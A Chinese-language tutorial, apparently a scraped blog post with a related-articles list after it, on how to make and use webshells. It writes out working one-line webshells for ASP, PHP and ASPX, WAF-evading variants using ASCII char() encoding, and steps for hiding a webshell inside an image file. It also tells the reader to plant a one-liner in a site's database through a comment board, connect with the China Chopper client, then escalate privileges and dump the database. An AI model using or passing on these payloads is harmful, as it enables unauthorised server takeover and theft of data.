webshell制作原理

  webshell种类

    一句话马(使用的最多)、小马、大马、打包马、脱裤马、、、

  一句话:

    介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色

    e.g:<%execute request("value")%>

    解释:

    execute:是一个执行函数,用来执行该命令

    request:是接收提交方式,可接受post型、get型、cookie型的传参

    value:是参数,也是我们用菜刀连接时的密码

    http://www.xx.com/x.asp?value=  以这种方式接收命令

    用菜刀连接时如下: 

  常见写法:

    asp一句话:

    <%eval request("pv")%>

    PHP一句话:

    <?php eval($_POST[a])?>

    aspx一句话:

    <%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%>

    jsp一句话:(也是一种小马)

    

  一句话马的变形(为了绕过waf)

    <?php $_REQUEST['a']($_REQUEST['b']);?>  这种方式已经淘汰了用不了了

    这个语句中没有执行函数,只有两个接收函数,使用的时候对参数a传递执行函数  /x.php?a=eval   然后再用菜刀连接

    

    <%Eval((Request(char(112))))%>

    用ascii码转码,不再使用单引号、双引号,防止闭合

    <%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)("xindong")%>

    用ascii码转码,不再使用单引号、双引号,防止闭合(asp用+号连接,php用.号连接)

    <%a=request("gold")%><%eval a%>

  一句话图片马制作(隐写,建议使用搭建网站的素材图片)

    c32或winhex做一句话

      用该软件打开图片,讲一句话代码放在最后面保存

    cmd下做一句话

      copy /d 1.jpg+1.asp 2.jpg  不建议

    也可以在图片属性中的详细信息中添加一句话(版权中)

  常见的一句话客户端

    一句话客户端增强版

    中国菜刀  右后门  菜刀上传大马1,再删除菜刀码,大马1上传大马2,删除大马1,要脱三次

    中国砍刀

    lanker一句话客户端

    zv新型PHP一句话客户端GUI版

  小马

    体积小,易隐蔽,最重要的是与图片结合在一起上传后可以利用nginx或者iis6的解析漏洞来运行,不过功能少,一般只用来上传大马

  大马

    体积大,50K大小左右,功能多,一般包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些具备自带的提权功能和压缩,解压缩网站程序功能,隐蔽性不好,而且大多数代码不加密或被查杀。

一句话的使用

    首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到数据库,或者网页。我们的目的是把一句话添加到数据库,无论任何方式。然后菜刀连接。

  小马使用

    主要用来上传大马

  大马使用

    提权、打包、脱裤、增删文件、、、

  使用技巧

    内容编码、配合解析漏洞、配合文件包含、利用文件名溢出

      文件包含代码,放在b.asp

    <!--#include file="conn.asp"-->

      conn.asp 就是要包含的文件

  使用的时候直接访问b.asp,就会加载conn.asp文件

webshell“黑吃黑”

  找shell后门

    查找后门、查找webshell后门、找到后门地址、返搞webshell箱子

web 渗透【4】脚本马的制作与原理相关推荐

  1. 渗透知识-脚本木马的制作原理

    一.webshell制作原理 1.webshell种类 一句话木马(使用的最多).小马.大马.打包马.脱裤马等等 2.一句话木马 介绍:短小精悍,并且功能强大.隐蔽性非常好,在入侵种始终扮演着非常重要 ...

  2. 脚本木马的制作与原理

    webshell(web后门) 一.一句话木马 短小精悍,功能强大,隐蔽性好. <% execute request("value") %> 说明: 使用request ...

  3. 【愚公系列】2023年05月 网络安全高级班 071.WEB渗透与安全(文件包含漏洞原理利用防御)

    文章目录 前言 一.文件包含漏洞原理利用防御 1.原理 1.1 简介 1.2 分类 1.3 代码 1.3.1 shell语句 1.3.2 包含语句 2.渗透 2.1 低安全级别 2.1.1 本地文件包 ...

  4. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  5. 2019年赣州市赛任务四利用python脚本进行web渗透测试

    任务四:利用python脚本进行web渗透测试 任务环境说明: 服务器场景名称: W-WebServ2008 服务器场景操作系统:Microsoft Windows2008 Server 服务器场景用 ...

  6. Web渗透-SQL注入

    渗透测试基础 一.渗透攻击流程 二.渗透测试主流工具 域名注册信息查询: Whois在线查询目标网络信息DNS和IP,nslookup 在线漏洞搜索引擎: fofa.info,shodan.io,zo ...

  7. 文件上传漏洞---Web渗透学习

    文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件. 这里上传的文件可以是木 ...

  8. 图片马 php 菜刀,图片马的制作以及菜刀的使用

    有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中 ...

  9. Web渗透 不断更新

    Web渗透 SQL注入 一般注入步骤 堆叠注入 堆叠注入原理 堆叠注入条件 堆叠注入实例 handler 盲注 GET&POST 检测绕过 变量替换.变换绕过 报错注入 SSTI模板注入 文件 ...

最新文章

  1. sizeof()与strlen()的区别与联系
  2. 蓝书4.1-4.4 树状数组、RMQ问题、线段树、倍增求LCA
  3. 全国计算机二级vb得分技巧,全国计算机等级考试二级VB笔试各题型答题技巧(2)...
  4. 编写Arduino支持的C++类库
  5. 箭头函数的this指向谁_高阶函数
  6. SQL Server 大数据群集 部署(二)工具篇
  7. oracle并行查询结果不唯一,Oracle数据库并行查询出错的解决方法
  8. 模式实例之——单件模式实例
  9. 服务器系列和酷睿系列,三大系列 从英特尔主流处理器选择服务器(2)
  10. 五周第三次课(4月20日)shell介绍、命令历史、命令补全和别名、通配符 、输入输出重定向...
  11. 硬盘安装manjaro linux,安装Manjaro Linux的详细步骤
  12. QT QPainter
  13. 玩转数据可视化之R语言ggplot2:(一)ggplot2实现箱线图、小提琴图、直方图等图形(快速入门)
  14. YouTube批量下载开源代码汇总
  15. 心理咨询类_微信小程序项目实战、含:标注图、效果图、视频、源码
  16. 用html5画瀑布图,maftools | 从头开始绘制发表级oncoplot(瀑布图)
  17. java发送邮件连接超时,Java邮件超时和连接超时处理
  18. ChatGPT聊天机器人如何发图片????
  19. Python爬取链家的数据并绘制热力图
  20. CSS(列表+表格+链接+自定义鼠标光标)样式

热门文章

  1. 世界第一的激光雷达企业如何造就?看 Velodyne 与 David Hall 的技术人生
  2. 机器学习(书籍推荐)
  3. ECMA 262 13 Expressions
  4. WTH数(hrbustOJ月赛题目)
  5. C语言运算符优先级 之 快速记忆
  6. Python每日一练19、简单的加减法数学游戏
  7. 怎样将一个dataframe存入csv文件,不带行标
  8. Tom-Skype命令行参数
  9. 成都写字楼租金价格?国际文创产业园数字影像产业总部基地大厦租金价格出炉!
  10. 高级程序员必修课--sql思维举重训练